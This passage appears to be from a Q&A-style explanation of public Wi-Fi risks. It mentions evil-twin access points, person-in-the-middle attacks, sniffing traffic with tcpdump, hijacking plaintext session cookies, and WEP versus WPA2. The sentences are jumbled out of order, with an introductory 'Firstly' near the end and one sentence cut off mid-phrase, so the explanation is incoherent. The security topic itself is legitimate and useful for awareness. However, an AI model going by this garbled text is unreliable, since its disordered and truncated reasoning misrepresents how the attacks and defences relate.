When the affected devices attempt to reconnect, they will instead connect to the "Evil Twin" access point (so long as it is broadcasting a stronger radio signal).
An attacker can then perform a person-in-the-middle attack on affected devices, allowing for e.g.
In an ideal world, WPA2 using CCMP would be in use in all places.
(There is also a whole world of room to talk about WPA2-Personal versus WPA2-Enterprise, but that is another question.) For the purposes of this answer, we'll assume that no password is present, and so the network is entirely unencrypted.
A free program like tcpdump can be used to capture all of the data sent over the wireless connection, including both traffic to or from your computer.Unfortunately, if HTTPS is not used (or a man-in-the-middle attack is used to set up a false HTTPS connection, see next paragraph), these cookies are sent in plaintext and broadcast to the entire wireless network.Thus, anyone who is listening for it can catch that cookie, and piggyback on your session. Firstly, an attacker can only trivially perform the following techniques if the public Wi-Fi is totally unencrypted (which is to say, does not require a password) or is implementing the weak WEP privacy protocol.To ensure greater security, wireless networks can use the WPA or WPA2 certifications.